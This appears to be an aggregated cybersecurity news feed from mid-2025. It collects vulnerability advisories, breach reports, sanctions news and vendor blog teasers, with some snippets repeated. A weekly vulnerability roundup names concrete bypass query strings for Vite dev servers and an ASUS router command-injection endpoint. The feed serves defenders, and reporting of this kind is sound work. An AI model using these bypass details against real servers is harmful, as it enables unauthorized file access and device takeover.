I veckan kom nyheten om Sveriges nya digitaliseringsstrategi för 2025–2030 som pekar ut riktningen för regeringens digitaliseringspolitik.

A newly disclosed vulnerability, tracked as CVE-2025-27522, has been discovered in Apache InLong, a widely used real-time data streaming platform. The Apache InLong vulnerability introduces the potential for remote code execution (RCE).  The vulnerability affects Apache InLong versions 1.13.0 through 2.1.0, making a wide range of deployments potentially vulnerable. According to the official Apache security advisory, the flaw results from the deserialization of untrusted data during JDBC verification processing, allowing attackers to exploit how serialized Java objects are handled.  The Nature of the Apache InLong Vulnerability (CVE-2025-27522)  Designated as CVE-2025-27522, this vulnerability is classified as moderate in severity, yet its potential impact on production environments is far from trivial. It serves as a secondary mining bypass for a previously disclosed vulnerability, CVE-2024-26579.  This particular vulnerability stems from insecure handling of serialized data in InLong’s JDBC component. When data is received during JDBC verification, Apache InLong fails to adequately sanitize or validate the contents before deserializing them. Malicious actors could exploit this gap to send specially crafted payloads, which, when deserialized, could trigger unauthorized behavior such as file manipulation or arbitrary code execution.  Official Disclosure and Technical Insight The vulnerability was disclosed by security researchers known as yulate and m4x, and was officially published in a message by Charles Zhang to Apache’s developer mailing list on Wednesday, May 28. According to Apache, affected users should immediately upgrade to InLong version 2.2.0 or apply the fix included in GitHub Pull Request #11732.  The CVE entry for CVE-2025-27522 can be found in the official CVE database. Apache’s GitHub repository includes detailed documentation of the issue and the remediation steps taken in the patch. The patch, merged by contributor dockerzhang on February 9, addressed sensitive parameter bypasses during JDBC processing.  Security Implications and Exploitation Risk  While no public proof-of-concept or reports of active exploitation have surfaced, the vulnerability is considered network-exploitable and does not require user interaction, which elevates the risk. The Common Weakness Enumeration (CWE) identifier assigned to this flaw is CWE-502: Deserialization of Untrusted Data—a well-known class of vulnerabilities that has historically led to severe security breaches.  According to Apache, the CVSS v3.1 base score for CVE-2025-27522 ranges between 5.3 and 6.5, indicating a moderate to high severity level. Given its potential for enabling remote code execution, even moderate CVSS scores warrant serious attention. Recommended Mitigation Steps  To mitigate the Apache InLong vulnerability:  Upgrade to Apache InLong 2.2.0 immediately.  Alternatively, apply the cherry-picked patch #11732 from the Apache GitHub repository.  Restrict sources of serialized data and implement input validation and sanitization on all data that may be deserialized.  Monitor systems for signs of suspicious deserialization behavior or unauthorized activity.  A sample secure deserialization code snippet for Java can help reduce similar risks in custom implementations:  Conclusion  CVE-2025-27522 highlights how deserialization vulnerabilities can target enterprise systems. Given Apache InLong's role in managing large-scale data ingestion and distribution, any security flaw, especially one that could lead to remote code execution, requires quick and decisive action. Security teams should prioritize applying the patch or upgrading to Apache InLong 2.2.0, while also reinforcing general deserialization protections across their application stack.

The China-linked threat actor behind the recent in-the-wild exploitation of a critical security flaw in SAP NetWeaver has been attributed to a broader set of attacks targeting organizations in Brazil, India, and Southeast Asia since 2023. "The threat actor mainly targets the SQL injection vulnerabilities discovered on web applications to access the SQL servers of targeted organizations," Trend...

Over two audits in 2023, we reviewed a blockchain system developed by Axiom that allows computing over the entire history of Ethereum, all verified by zero-knowledge proofs (ZKPs) on-chain using ZK-verified elliptic curve and SNARK recursion operations. This system is built using the Halo2 framework—a complex, emerging technology that presents many challenges when building a secure application, including potential under-constrained issues resulting from its low-level API.

The OneDrive File Picker flaw could affect hundreds of apps, researchers warn

Breaking Out of the Security Mosh Pit When Jason Elrod, CISO of MultiCare Health System, describes legacy healthcare IT environments, he doesn't mince words: "Healthcare loves to walk backwards into the future. And this is how we got here, because there are a lot of things that we could have prepared for that we didn't, because we were so concentrated on where we were." This chaotic approach has...

Take care when downloading AI freebies, researcher tells The Register Criminals are using installers for fake AI software to distribute ransomware and other destructive malware.

We've added plenty of new functionality to our data enrichment feature - you can now enrich an ASN and an IPv6 address. We've also provided Enterprise users the ability to drill-down into IOFA Feed data with a dedicated space for curated IOFA Feeds, and an all-new 'Feed Analytics' screen. The post Treasury Sanctions FUNNULL for Enabling Global Cybercrime appeared first on Silent Push.

Severity: Medium CVE-2025-5307 could allow a local attacker to disclose sensitive information or execute arbitrary code CVE-2025-5307 could allow a local attacker to disclose sensitive information or execute arbitrary code Updated: 30 May 2025

Greater Manchester Police reprimanded over hours of video that went AWOL The UK’s data watchdog has reprimanded Greater Manchester Police (GMP) force for losing CCTV footage the cop shop was later requested to retain.

While small businesses are aiming to bolster their cyber defences, they're wary of AI

From a flurry of attacks targeting UK retailers to campaigns corralling end-of-life routers into botnets, it's a wrap on another month filled with impactful cybersecurity news

War in Ukraine causes major rethink in policy and spending The UK is spending more than £1 billion ($1.35 billion) setting up a new Cyber and Electromagnetic Command and is recruiting a few good men and women to join up and staff it.

"We don’t just want payment; we want accountability." The malicious hackers behind the Interlock ransomware try to justify their attacks. Learn more about what you need to know about Interlock in my article on the Tripwire State of Security blog.

30-year anniversary event adds classes and sessions to address new risks Partner content  Infosecurity Europe celebrates its 30th anniversary by doubling down on its mission: Building a Safer Cyber World. Returning to ExCeL London from 3-5 June, the landmark edition of Europe's most influential cybersecurity event is set to be its most ambitious yet. With global cyberthreats mounting in scale and sophistication, the 2025 show will deliver strategic insight, practical training, and powerful connections across three days of expert content and community collaboration.

The U.S. Department of Treasury's Office of Foreign Assets Control (OFAC) has levied sanctions against a Philippines-based company named Funnull Technology Inc. and its administrator Liu Lizhi for providing infrastructure to conduct romance baiting scams that led to massive cryptocurrency losses. The Treasury accused the Taguig-headquartered company of enabling thousands of websites involved in...

This week, we are reporting on a widespread malware targeting Android TV devices.

This week, we are reporting on a widespread malware targeting Android TV devices.

Attack attempts picked up by Cyble Sensors' honeypots highlight threat actors' resourcefulness and the need for strong security defenses. Cyble's honeypot sensors have detected attack attempts on product vulnerabilities from SAP and Ivanti, among other vulnerabilities targeted this week. The sensors, part of Cyble's Threat Hunting service, capture real-time attack data, including exploit attempts, malware intrusions, financial fraud, and brute-force attacks. Cyble's weekly Sensor Intelligence report to clients also detailed numerous malware attacks such as CoinMiner Linux, WannaCry, Linux Mirai Coin Miner, Linux IRCBot, and Android Coin Hive Miner. Also, this week, Cyble Vulnerability Intelligence researchers flagged high-risk IT and industrial control system (ICS) vulnerabilities for security teams to prioritize. Here are some highlights from those reports. Cyble Sensors Detect SAP, Ivanti Exploit Attempts Here are a few of the dozens of vulnerabilities targeted in exploit attempts detected by Cyble sensors this week. SAP NetWeaver Visual Composer Metadata Uploader is affected by a critical security flaw, designated as CVE-2025-31324, due to missing authorization controls, which could allow unauthenticated users to upload malicious binaries that could compromise the host system. The flaw has been patched (sign-in required). An authentication flaw, identified as CVE-2025-4427, in the API of Ivanti Endpoint Manager Mobile versions up to 12.5.0.0 could allow unauthorized access to protected resources without requiring valid authentication. Cyble vulnerability researchers also highlighted the SAP and Ivanti vulnerabilities in last week's report. CrushFTP versions 10 (prior to 10.8.4) and 11 (prior to 11.3.1) are vulnerable to an authentication bypass flaw affecting the crushadmin account. The vulnerability (CVE-2025-31161) stems from a race condition in the AWS4-HMAC authorization method used by the server's HTTP component. The flaw could allow attackers to bypass authentication by exploiting how the server verifies user existence without requiring a password. The issue can be further stabilized using a crafted AWS4-HMAC header, potentially enabling unauthorized access to any known or guessable user account. Successful exploitation can lead to full system compromise, especially if a DMZ proxy instance is not in use. Cyble sensors also detected attack attempts on a pair of vulnerabilities in Vite Dev Server, a frontend tooling framework for JavaScript. CVE-2025-31125 could allow unintended exposure of restricted file contents via specific query parameters. The flaw only affects apps that make the Vite dev server publicly accessible using --host or server.host. CVE-2025-30208 could allow the @fs file access restriction to be bypassed by appending specially crafted query parameters such as ?raw?? or ?import&raw??. The vulnerability arises due to incorrect handling of trailing characters in the query string, potentially enabling attackers to access files outside the allowed path. The issue affects versions before 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10, and only impacts servers exposed to the network. IT and ICS Vulnerabilities Examined Cyble vulnerability researchers examined 17 IT and ICS vulnerabilities this week, including six under discussion by threat actors on dark web forums, and flagged four as meriting high-priority attention by security teams. CVE-2025-47949 affects all versions of the samlify Node.js library prior to version 2.10.0. Samlify is widely used for implementing SAML 2.0 Single Sign-On (SSO) in enterprise applications. The flaw could potentially allow attackers to forge SAML authentication responses, bypassing login protections and impersonating any user, including administrators. CVE-2023-39780 is a high-severity vulnerability affecting ASUS RT-AX55 routers running firmware version 3.0.0.4.386.51598. The flaw could allow authenticated attackers to perform operating system (OS) command injection via the /start_apply.htm endpoint, specifically through the qos_bw_rulelist parameter. Attackers could execute arbitrary commands on the device, potentially gaining administrative control or launching further attacks on the network. Recently, researchers disclosed that attackers have exploited this vulnerability in a widespread and stealthy botnet campaign, compromising over 9,000 ASUS routers and enabling persistent, unauthorized access to the affected devices. Rockwell Automation's FactoryTalk Historian ThingWorx (95057C-FTHTWXCT11: Versions v4.02.00 and prior) is vulnerable to a 2018 Apache log4net vulnerability involving Improper Restriction of XML External Entity (XXE) Reference. This remotely exploitable vulnerability, which requires low attack complexity, could allow attackers to execute XXE-based attacks by leveraging malicious log4net configuration files, potentially leading to data exposure or further compromise. The risk is further intensified by Cyble researchers' observation of internet-facing instances of the affected product, underscoring the need for immediate mitigation efforts. Johnson Controls' iSTAR Configuration Utility (ICU), a key element in managing physical access and integrating with CCTV systems, is deployed across sectors such as energy, transport, critical manufacturing, and government. A recently disclosed vulnerability, CVE-2025-26383, could be exploited to leak memory from the ICU, potentially exposing sensitive data related to access control operations. Given the ICU's central role in safeguarding restricted areas, such an exposure could pose a significant risk to the integrity and confidentiality of physical security environments. Conclusion The wide range of IT and ICS vulnerabilities highlighted this week shows the creativity and resourcefulness of threat actors. These vulnerabilities require equal commitment from security teams charged with defending IT and critical infrastructures. A risk-based vulnerability management program should be at the heart of those defensive efforts. Other cybersecurity best practices that can help guard against a wide range of threats include segmentation of critical assets, removing or protecting web-facing assets, Zero-Trust access principles, ransomware-resistant backups, hardened endpoints, infrastructure, and configurations, network, endpoint, and cloud monitoring, and well-rehearsed incident response plans. Cyble's comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes. They can also monitor for leaked credentials and other early warning signs of major cyberattacks. Get a free external threat profile for your organization today. The post The Week in Vulnerabilities: Cyble Sensors Detect Attack Attempts on SAP, Ivanti appeared first on Cyble.

ConnectWise, the developer of remote access and support software ScreenConnect, has disclosed that it was the victim of a cyber attack that it said was likely perpetrated by a nation-state threat actor. "ConnectWise recently learned of suspicious activity within our environment that we believe was tied to a sophisticated nation-state actor, which affected a very small number of ScreenConnect...

In addition to Coca-Cola, entities in Abu Dhabi, Jordan, Namibia, South Africa, and Switzerland are experiencing extortion attacks, all involving stolen SAP SuccessFactor data.

As threats become more sophisticated, cybercriminals are finding ways to get around MFA measures. This poses the question: is MFA enough to protect against modern threats?

Meta on Thursday revealed that it disrupted three covert influence operations originating from Iran, China, and Romania during the first quarter of 2025. "We detected and removed these campaigns before they were able to build authentic audiences on our apps," the social media giant said in its quarterly Adversarial Threat Report. This included a network of 658 accounts on Facebook, 14 Pages, and...

The Apache Software Foundation released security updates to address the vulnerability in the Apache Tomcat.

Microsoft released a security update to address vulnerabilities in Microsoft Edge.

The threat actors behind the DragonForce ransomware gained access to an unnamed Managed Service Provider’s (MSP) SimpleHelp remote monitoring and management (RMM) tool, and then leveraged it to exfiltrate data and drop the locker on multiple endpoints. It’s believed that the attackers exploited a trio of security flaws in SimpleHelp (CVE-2024-57727, CVE-2024-57728, and CVE-2024-57726) that […]

Fake installers for popular artificial intelligence (AI) tools like OpenAI ChatGPT and InVideo AI are being used as lures to propagate various threats, such as the CyberLock and Lucky_Gh0$t ransomware families, and a new malware dubbed Numero. “CyberLock ransomware, developed using PowerShell, primarily focuses on encrypting specific files on the victim’s system,” Cisco Talos researcher […]

Multiple vulnerabilities were identified in Microsoft Edge. A remote attacker could exploit some of these vulnerabilities to trigger sensitive information disclosure, denial of service condition, data manipulation and remote code execution on the targeted system. Impact Remote Code Execution Denial of Service Information Disclosure Data Manipulation System / Technologies affected Microsoft Edge Stable Channel version prior to 137.0.3296.52 Microsoft Edge Extended Stable Channel prior to 136.0.3240.104 Solutions Before installation of the software, please visit the software vendor web-site for more details. Apply fixes issued by the vendor: Update to Microsoft Edge Stable Channel version 137.0.3296.52 or later Update to Microsoft Edge Extended Stable Channel version 136.0.3240.104 or later

The U.S. government today imposed economic sanctions on Funnull Technology Inc., a Philippines-based company that provides computer infrastructure for hundreds of thousands of websites involved in virtual currency investment scams, commonly known as “pig butchering." In January 2025, KrebsOnSecurity detailed how Funnull was being used as a content delivery network that catered to cybercriminals seeking to route their traffic through U.S.-based cloud providers.

Probably not a cyber-incident, but definitely not a good look Security services vendor SentinelOne experienced a major outage on Thursday.

Philippines company allegedly run by Chinese national has form running scams The US Treasury has sanctioned a Philippine company and its administrator after linking them to the infrastructure behind the majority of so-called "pig butchering" scams reported to the FBI.

De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Certaines d'entre elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données, un contournement de la politique de sécurité et un déni de service.

De multiples vulnérabilités ont été découvertes dans ISC Kea DHCP. Certaines d'entre elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et une atteinte à l'intégrité des données.

Une vulnérabilité a été découverte dans Spring Cloud Gateway Server. Elle permet à un attaquant de provoquer un contournement de la politique de sécurité.

Une vulnérabilité a été découverte dans Apache Tomcat. Elle permet à un attaquant de provoquer un contournement de la politique de sécurité.

De multiples vulnérabilités ont été découvertes dans Microsoft Edge. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.

De multiples vulnérabilités ont été découvertes dans IBM Db2. Elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance et un déni de service à distance.

De multiples vulnérabilités ont été découvertes dans le noyau Linux de Red Hat. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire, une élévation de privilèges et une atteinte à la confidentialité des données.

De multiples vulnérabilités ont été découvertes dans le noyau Linux de Debian. Elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et un déni de service.

De multiples vulnérabilités ont été découvertes dans le noyau Linux de Debian LTS. Elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et un déni de service.

Elastic Security Labs walks through EDDIESTEALER, a lightweight commodity infostealer used in emerging CAPTCHA-based campaigns.

At this year's Build developer conference, Microsoft reflected on what the company learned about securing features and writing secure code in the early 2000s.

'The operating system couldn't be loaded' is never a great message Microsoft's latest Patch Tuesday update is failing to install on some Windows 11 machines, mostly virtual ones, and dumping them into recovery mode with a boot error. Its only recommendation to avoid the problem for now is to dodge the update.

New guidance includes a list of 10 best practices to protect sensitive data throughout the AI life cycle, as well as tips to address supply chain and data-poisoning risks.

The adversary group commonly referred to as Scattered Spider is also tracked as UNC3944, Muddled Libra, Octo Tempest, Starfraud, Scatter Swine, 0ktapus, Roasted 0ktapus, and Storm-0875. Active since at least 2022, this financially motivated group has rapidly gained notoriety for its social engineering campaigns and ransomware attacks, which span multiple sectors. Initially focused on telecom […] The post Netskope Threat Coverage: Scattered Spider appeared first on Netskope.

The lingerie retailer isn't revealing much about the security incident it's dealing with but has brought in third-party experts to address the issue.

Thousands of ASUS routers have been infected and are believed to be part of a wide-ranging ORB network affecting devices from Linksys, D-Link, QNAP, and Araknis Network.

The outage reportedly hit 10 commercial customer consoles for SentinelOne's Singularity platform, including Singularity Endpoint, XDR, Cloud Security, Identity, Data Lake, RemoteOps, and more.

Cybersecurity experts are warning that scammers are taking advantage of uncertainty surrounding the U.S. administration’s tariff policies, CNBC reports.

Red Canary's MDR portfolio complements Zscaler's purchase last year of Israeli startup Avalor, which automates collection, curation, and enrichment of security data.

APT41, a Chinese state-sponsored threat actor also known as "Double Dragon," used Google Calendar as command-and-control infrastructure during a campaign last fall.

House Homeland Security Committee takes a field trip to Silicon Valley Chinese government spies burrowed deep into American telecommunications systems and critical infrastructure networks for one reason, according to retired US Army Lt. Gen. H.R. McMaster.

Praetorian recently finished a tour de force at Hack Space Con, providing paid training, a workshop, and three talks: The entire Praetorian team had a blast at the conference, sharing our knowledge with the security community and making many new friends. HackVapeCon Before the conference started, four members of Praetorian’s Internet of Things (IoT) team […] The post Hardware Hacking a Nicotine Vape appeared first on Praetorian.

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202[SS9.1]5) for more information.

As organizations increasingly embrace AI-powered coding tools to accelerate development and reduce engineering overhead, a new threat is emerging at the intersection of generative AI and open-source software (OSS): slopsquatting. The post The Rise of Slopsquatting: A New Software Supply Chain Threat  first appeared on The Versa Networks Blog.

A member of a California-based fight club seems to have attended an event hosted by groups with ties to an organization the US government labeled a terrorist group. Will the Trump administration care?

UPDATE 3 (20:47 UTC, May 31, 2025): A Root Cause Analysis into the May 29, service disruption has been completed and can be found below. Official RCA for May 29 Service Disruption On May 29, 2025, SentinelOne experienced a global service disruption affecting multiple customer-facing services. During this period, customer endpoints remained protected, but security […]

Talos Content Manager Amy introduces themself, shares her unconventional journey into cybersecurity and reports on threats masquerading as AI installers.

Healthcare data security is not just an IT concern, but a fundamental pillar of patient care and organizational survival. From electronic health records (EHRs) to connected medical devices and cloud-based systems, the sector has embraced innovation. But with that innovation comes risk.  According to Sophos, 67% of healthcare organizations experienced ransomware attacks in 2024. And another study shows that healthcare has long been a big target:... Read more » The post Healthcare Data Security: How to Stay Ahead of Threats in a High-Stakes Industry appeared first on Plixer.

Google's Veo 3 delivers AI videos of realistic people with sound and music. We put it to the test.

While the botnet may not be completely automated, it uses certain tactics when targeting devices that indicate that it may, at the very least, be semiautomated.

The U.S. website of Victoria’s Secret is down after an unspecified security incident, the latest in a series of cyber incidents hitting retailers. A status message on the Victoria’s Secret website says the company “identified and are taking steps to address a security incident. We have taken down our website and some in store services as a precaution. Our team is working around the clock to fully restore operations.” Victoria’s Secret and PINK stores remain open, the status message reads. It is not clear what type of security incident was involved or whether customer data was affected. In a statement to The Cyber Express, a Victoria’s Secret spokesperson said the company “immediately enacted our response protocols” and engaged “third-party experts” for assistance. “We are working to quickly and securely restore operations,” the spokesperson added. Victoria’s Secret Latest Retail Cyber Incident The Victoria’s Secret website incident is the latest in a string of cyber incidents hitting retailers in recent weeks. The cyber spree targeting retailers began in late April, when three UK retailers were hit in a matter of days. Those attacks have been attributed to the Scattered Spider threat group and reportedly involved the deployment of DragonForce ransomware. Other recent cybersecurity incidents have affected Dior and Adidas, and Google warned in mid-May that Scattered Spider was apparently targeting U.S. retailers. Victoria’s Secret, which has generated more than $6 billion in sales in the last year, saw its shares (NYSE:VSCO) fall more than 10% since news of the security incident broke on Wednesday. Bloomberg reported that an internal company communication said recovery from the security incident could take “awhile.” Defending Against Scattered Spider After the UK retail incidents, the UK’s National Cyber Security Centre issued guidance for retailers to protect their operations from cyberattacks. Those steps include: Using multi-factor authentication Monitoring for signs of account misuse, such as “risky logins” within Microsoft Entra ID Protection Monitoring Domain Admin, Enterprise Admin, and Cloud Admin accounts and making sure that any access is legitimate Review helpdesk password reset processes, including procedures for authenticating staff credentials before resetting passwords Making sure that security operation centers can identify suspicious logins, such as from VPN services in residential ranges Following tactics, techniques, and procedures sourced from threat intelligence “whilst being able to respond accordingly.” Google has also issued recent guidance for defending against Scattered Spider attacks.

The Qualys Threat Research Unit (TRU) has discovered two local information-disclosure vulnerabilities in Apport and systemd-coredump. Both issues are race-condition vulnerabilities. The first (CVE-2025-5054) affects Ubuntu’s core-dump handler, Apport, and the second (CVE-2025-4598) targets systemd-coredump, which is the default core-dump handler on Red Hat Enterprise Linux 9 and the recently released 10, as well as on Fedora. […]

Threat actors continue to develop and leverage various techniques that aim to compromise cloud identities. Despite advancements in protections like multifactor authentication (MFA) and passwordless solutions, social engineering remains a key aspect of phishing attacks. Implementing phishing-resistant solutions, like passkeys, can improve security against these evolving threats. The post Defending against evolving identity attack techniques appeared first on Microsoft Security Blog.

The Treasury said Funnull was involved in providing infrastructure for pig butchering crypto scams.

What does values-driven leadership look like in the world of artificial intelligence (AI)? And what responsibilities do AI consumers have? The post AI governance requires trustworthy, values-driven leadership appeared first on The Aspen Institute.

The landscape of VAT compliance in Europe is undergoing a seismic shift. The ViDA (VAT in the Digital Age) proposal, approved on March 11, 2025, signals a new era for multinational companies. This landmark initiative aims to modernize and streamline VAT processes across the EU, primarily through the widespread adoption of e-invoicing and digital reporting. While this promises greater efficiency and transparency, it also presents significant challenges for businesses operating across multiple European nations.  The three pillars of ViDA  The ViDA proposal rests on three key pillars:  E-Invoicing and Digital Reporting Requirements: This pillar focuses on real-time digital reporting of VAT transactions, mandating cross-border e-invoicing to ensure accuracy and reduce fraud. Restrictions on e-invoicing will be removed, paving the way for full digital adoption.  Single VAT Registration in the EU: ViDA simplifies VAT compliance by allowing businesses to register for VAT only once across the entire EU, streamlining operations and reducing administrative burdens.  Enhanced Rules Around Digital Platforms: The rules ensure VAT is correctly applied to transactions facilitated by online platforms, making platforms responsible for VAT collection and remittance.  The e-invoicing revolution: Obligations and timelines  The most immediate impact of ViDA will be on the world of e-invoicing. The proposal mandates that all cross-border transactions must be electronically invoiced and reported in near-real-time with the objective of streamlining VAT reporting and reducing fraud.  A key change is the removal of the "buyer acceptance" principle, which previously allowed buyers to refuse electronic invoices. This restriction has hindered the widespread adoption of e-invoicing and prevented countries from mandating it nationally. With these restrictions lifted, countries are expected to implement e-invoicing mandates more rapidly.  While the directive sets a deadline of July 1, 2030, for full integration of e-invoicing and digital reporting requirements into national legislation, many countries are expected to implement these changes much sooner.  The challenges for multinationals  Multinational companies face a complex challenge. With approximately ten EU member states already implementing their own e-invoicing mandates and the remaining seventeen expected to follow, businesses can anticipate dealing with an average of three to four new e-invoicing mandates per year until mid-2030. Given that implementing a single e-invoicing mandate can take enterprises up to two years, this represents a significant burden on resources.  OpenText's commitment to ViDA compliance  As a leading provider of global e-invoicing services, OpenText is committed to supporting businesses through these changes. The OpenText Trading Grid e-Invoicing solution is already equipped to manage e-invoicing regulations in over fifty countries. OpenText provides a managed services approach to e-invoicing, offering an end-to-end solution that includes evaluating readiness and supporting integrations with internal systems, external stakeholders, and national e-invoicing portals, as well as maintaining ongoing compliance with any changes that follow.  The approval of the ViDA report marks a monumental step towards a more efficient and transparent VAT system in Europe. While the transition presents challenges, it also offers opportunities for businesses to streamline their operations and reduce costs. Companies that proactively prepare for these changes will be best positioned to thrive in the new digital landscape. Stay tuned for further updates as the ViDA proposal is implemented and its impact unfolds.  Learn more about OpenText’s OpenText Trading Grid e-Invoicing. The post Navigating the ViDA revolution: What multinationals need to know about e-invoicing in Europe  appeared first on OpenText Blogs.

No formal attribution made but two separate probes hint at the same suspect Thousands of Asus routers are currently ensnared by a new botnet that is trying to disable Trend Micro security features before exploiting vulnerabilities for backdoor access.

While the leak affected customer data, LexisNexis said in a notification letter that its products and systems were not compromised.

The post Customer Story: The Cloud Crew & Digital Shield appeared first on Graylog.

Get insights on the latest trends from GitHub experts while catching up on these exciting new projects. The post 4 trends shaping open source funding—and what they mean for maintainers appeared first on The GitHub Blog.

Microsoft Deputy CISO Yonatan Zunger shares tips and guidance for safely and efficiently implementing AI in your organization. The post How to deploy AI safely appeared first on Microsoft Security Blog.

What does the LockBit data breach reveal about the group’s inner workings?

The post Reuters: US sanctions Philippines digital infrastructure provider linked to virtual currency scams appeared first on Silent Push.

The post U.S. Sanctions Cloud Provider ‘Funnull’ as Top Source of ‘Pig Butchering’ Scams appeared first on Silent Push.

Fake installers for popular artificial intelligence (AI) tools like OpenAI ChatGPT and InVideo AI are being used as lures to propagate various threats, such as the CyberLock and Lucky_Gh0$t ransomware families, and a new malware dubbed Numero. "CyberLock ransomware, developed using PowerShell, primarily focuses on encrypting specific files on the victim's system," Cisco Talos researcher Chetan...

In early 2025 Gartner identified two strategies that, when combined, achieve a full zero trust architecture: Microsegmentation and Secure Access Service Edge (SASE). (see Gartner Strategic Roadmap for Zero Trust Implementation, 2025) In this short post we’ll explain why SASE alone is not enough, and why to achieve a truly comprehensive Zero Trust architecture, SASE must be combined with microsegmentation. SASE: An Incomplete Zero Trust Strategy SASE focuses on user access, ensuring users…

See how South London and Maudsley NHS Foundation Trust is using iboss to cut costs and boost productivity. The post SLAM NHS Foundation Trust turns to iboss for superior cybersecurity appeared first on iboss.

Why is airport Wi-Fi so painfully slow? It’s a familiar complaint and a constant source of frustration. Whether they’re scanning, swiping, streaming, or checking in, travelers count on digital services to work flawlessly from curb to gate. As the summer travel season kicks into high gear, how can airport IT teams keep...

Hackers used company GitHub account to steal software bits and personal information, company admits

When OT Devices Are Left Exposed  It started with a sudden alteration in chemical levels in the water treatment system. When a threat actor adjusted the level of sodium hydroxide to more than 100 times its normal amount, millions were at risk of being poisoned. Luckily, it was stopped in time.  This is not fiction.... The post One Platform, Total OT Protection: Cato’s Response to CISA’s Mitigation Guidelines  appeared first on Cato Networks.

In a bold pivot toward modern warfare, the UK Ministry of Defence (MOD) has announced a £1 Billion (approximately $1.35B) investment to build out a battlefield AI system dubbed the “Digital Targeting Web” and to stand up a dedicated Cyber and Electromagnetic Command. The initiative—announced Thursday by Defence Secretary John Healey—marks a significant inflection point in the UK’s defense posture, aimed squarely at matching the digital tempo of modern conflict. The new capabilities are core deliverables under the UK’s Strategic Defence Review (SDR), which lays out a ten-year transformation plan for British defense. The timing, optics, and scope send a clear message: warfare is evolving fast, and the UK intends to lead from the front. From Corsham to Combat: Connecting the Kill Chain The Digital Targeting Web is, in essence, a battlefield operating system. It’s designed to accelerate how UK forces identify, coordinate, and engage threats—linking sensors, platforms, and weapons across land, air, sea, and cyberspace into a single responsive network. Think real-time target handoffs between a satellite, an F-35, a drone, and a cyber operator—all in seconds, not minutes, the MOD explained. This is likely the blueprint for how modern battles will be fought and won, Healey called out during a visit to MOD Corsham, the UK military’s cyber headquarters. According to the MOD, the system will bring together AI, advanced sensors, space-based ISR (intelligence, surveillance, reconnaissance), and cyber capabilities to enable rapid kill-chain execution. In layman’s terms: detect a threat, decide on action, and destroy it—faster than the enemy can blink. The new system draws directly from lessons learned in Ukraine, where the Ukrainian military’s ability to find, fix, and finish Russian targets rapidly turned the tide in early 2022. British military planners see similar tempo and scale as essential to deterring or defeating threats in the future. Cyber Warfare Goes Operational Alongside the battlefield system, the UK is establishing a Cyber and Electromagnetic Command (CyberEM Command)—tasked with both defending MOD networks and leading offensive cyber ops in collaboration with the UK’s National Cyber Force. It comes at a time when UK defense systems are under near-constant digital siege. The MOD reported over 90,000 “sub-threshold” cyber intrusions over the past two years—malicious probes that fall just short of triggering a formal response but collectively represent a growing threat landscape. This new command will centralize capabilities across the armed services to degrade enemy command-and-control, jam enemy drones and communications, and conduct electromagnetic warfare with precision. It also answers a longer-standing challenge within NATO—how to give cyber and electronic warfare the same tactical footing as tanks or jets. With the creation of this command, the UK joins countries like the U.S. and Estonia in treating cyber as a core warfighting domain. Recruiting a Cyber Force, Not Just a Cyber Team To power this new digital-first force, the MOD is doubling down on cyber talent. A new Cyber Direct Entry program will offer recruits tailored training and rapid placement into operational cyber roles—with salaries starting over £40,000 and potential for £25,000 in additional pay. It’s a clear departure from traditional defense recruiting. Candidates won’t need to carry a rifle or serve in hostile environments. Instead, they’ll be dropped into cyber roles by late 2025, handling missions that matter just as much as physical deployments. It’s also a bet that the best digital talent in the UK is out there—and willing to serve—if offered the right path. The Larger Picture The announcement comes as the UK commits to increasing defense spending to 2.5% of GDP, signaling renewed political will to modernize forces in the face of rising global threats—from Russia’s ongoing aggression to the strategic pressure points in the Indo-Pacific. Also read: UK Ministry of Defence Suffers Major Data Breach, China’s Involvement Suspected But it’s not just about money or tech. The SDR and this week’s launch of the Cyber Command and Targeting Web reflect a fundamental rethinking of how Britain fights—and what kind of force it needs for the 2030s and beyond. “The hard-fought lessons from Putin’s illegal war in Ukraine leave us under no illusions that future conflicts will be won through forces that are better connected, better equipped and innovating faster than their adversaries,” Healey said. “We will give our Armed Forces the ability to act at speeds never seen before - connecting ships, aircraft, tanks and operators so they can share vital information instantly and strike further and faster.” The UK is betting that its next battlefield advantage won’t just come from firepower—but from firmware.

Infrastructure Used to Manage Domains Related to Cryptocurrency Investment Fraud Scams between October 2023 and April 2025

Reflecting on 10 years since its launch, the honeypot maker explains why the company did not take on any VC funding.

